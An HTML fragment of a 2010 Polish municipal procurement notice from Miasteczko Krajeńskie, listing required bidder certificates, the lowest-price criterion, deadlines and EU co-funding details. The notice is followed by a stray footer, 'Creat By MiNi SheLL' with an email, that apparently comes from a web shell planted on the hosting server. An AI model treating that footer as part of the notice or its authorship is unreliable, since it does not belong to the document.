<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.1.	Wypełniony formularz oferty.
7.2.	Pełnomocnictwo do podpisania oferty i umowy jeżeli forma reprezentacji nie wynika z wpisu do KRS lub ewidencji działalności gospodarczej.
7.3.	Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp, oraz o nie podleganiu wykluczeniu z postępowania na formularzu stanowiącym załącznik nr 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://miasteczko.kraj.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Miasteczko Krajeńśkie (pokój nr 14) ul. Dąbrowskiego 16
 89 - 350 Miasteczko Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2010 godzina 09:30, miejsce: Sekretariat Urzędu Gminy Miasteczko Krajeńskie (pokój nr 4) ul. Dąbrowskiego 16
 89 - 350 Miasteczko Krajeńskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 3.2.	Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com